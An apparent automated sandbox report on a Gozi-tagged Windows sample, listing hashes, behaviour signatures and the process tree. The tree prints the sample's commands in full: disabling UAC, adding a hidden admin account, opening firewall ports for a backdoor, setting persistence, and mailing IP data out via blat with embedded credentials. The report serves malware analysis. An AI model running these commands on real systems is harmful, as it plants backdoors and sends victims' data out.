Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
27/03/2025, 15:35
General
-
Target
JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe
-
Size
5.6MB
-
MD5
89dbe243829a1f6c79190897e3c8fbae
-
SHA1
b28d6881630e4ff0675cef42b55a910b3e1dd1c9
-
SHA256
59df1601a47511118c430b1961a05ed8000b73468dbbcaf06cd4048e8c7370c7
-
SHA512
13b639f23cc342718fe8d3f0930c7eaa64576cf6cd91e0db8555e799fa8d37fb08476631a8359021a53f38b04162f20081913186a5a20c5014f1226c0d8b99b8
-
SSDEEP
98304:GofZgqJrfcAmilwi/hMF5BdGTVNsUMDG5ACoRKqA4lsAS1J0lQW2AdYeBPZqV7fS:Hdl/lw8hMy5ORDG59pOHNF1ZcV7HHu9v
Malware Config
Extracted
gozi
Signatures
-
Gozi
Gozi is a well-known and widely distributed banking trojan.
-
Gozi family
-
UAC bypass 3 TTPs 1 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 16 IoCs
-
Loads dropped DLL 10 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 54 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
UPX packed file 10 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 32 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 4 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 61 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 4 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\inst.cmd" "3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\poc.exeC:\Users\Admin\AppData\Local\Temp\poc.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\poc.exeC:\Users\Admin\AppData\Local\Temp\poc.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=poc.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.06⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x350,0x7fff3bc6f208,0x7fff3bc6f214,0x7fff3bc6f2207⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=2660 /prefetch:37⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2624,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:27⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2200,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=2720 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3436,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3444,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4872,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3424,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4344,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3756,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6456,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6296,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6444 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6764,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6608,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6536 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3720,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5544,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4876,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=7016 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7008,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=7020 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6968,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=6932 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3980,i,16659642824025676791,2619036410127671396,262144 --variations-seed-version --mojo-platform-channel-handle=3972 /prefetch:87⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=poc.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.06⤵
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f4⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "C:\Windows\cam_server.exe pass=ganja1 port=57011" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Windows/ip.exe"4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Windows/cam_server.exe"4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="RealIP" dir=in program="C:\Windows\realip.exe" security=notrequired action=allow4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="C:\Windows\blat.exe" security=notrequired action=allow4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\cam_server.exe" "cam_server" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 57011 all4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant admin /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant admin /add5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Çñ¼¿*¿ßΓα*Γ«αδ HelpAssistant /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Çñ¼¿*¿ßΓα*Γ«αδ HelpAssistant /add5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant /active:yes /comment:"ôτÑΓ**∩ º*»¿ß∞ ñ½∩ »αÑñ«ßΓ*ó½Ñ*¿∩ »«¼«Θ¿" /passwordchg:yes4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant /active:yes /comment:"ôτÑΓ**∩ º*»¿ß∞ ñ½∩ »αÑñ«ßΓ*ó½Ñ*¿∩ »«¼«Θ¿" /passwordchg:yes5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant admin4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant admin5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\msupdate.msi" /qn /norestart4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://extremalzone.wallst.ru/IP.php4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://extremalzone.wallst.ru/IP.php5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ip.exeC:\Users\Admin\AppData\Local\Temp\ip.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ip.exeC:\Users\Admin\AppData\Local\Temp\ip.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\ip.bat" "6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all7⤵
- System Location Discovery: System Language Discovery
- Gathers network information
-
-
C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\realip.exerealip.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.17⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\blat.exeblat.exe -install -server smtp.yandex.ru -port 25 -f [email protected] -u andriuhapetuhov -pw nehnah7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\blat.exeblat.exe -to [email protected] -subject "Local IP" -attachi "localip.txt" -body "Locals IP"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 5608⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\blat.exeblat.exe -to [email protected] -subject "Real IP" -attachi "realip.txt" -body "Real IP"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 5608⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\attrib.exeattrib +S +H C:\Windows\system32\rserver304⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "C:\Windows/ip.exe /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\cam_server.execam_server.exe pass=ganja1 port=570114⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\cam_server.exeC:\Windows\cam_server.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 3526⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop rserver34⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rserver35⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet start rserver34⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rserver35⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\cam_server.exe pass=ganja1 port=570111⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\cam_server.exeC:\Windows\cam_server.exe pass=ganja1 port=570112⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\cam_server.exeC:\Windows\cam_server.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 3404⤵
- Program crash
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5712 -ip 57121⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5229860882D706664EA8CBAB233BBCB02⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 5C453C71FBEA7E71BE6661313F09F17A2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe"C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe" /stop3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\rserver30\rsetup64.exe"C:\Windows\SysWOW64\rserver30\rsetup64.exe" /intsetup3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe"C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe" /intuninstall3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
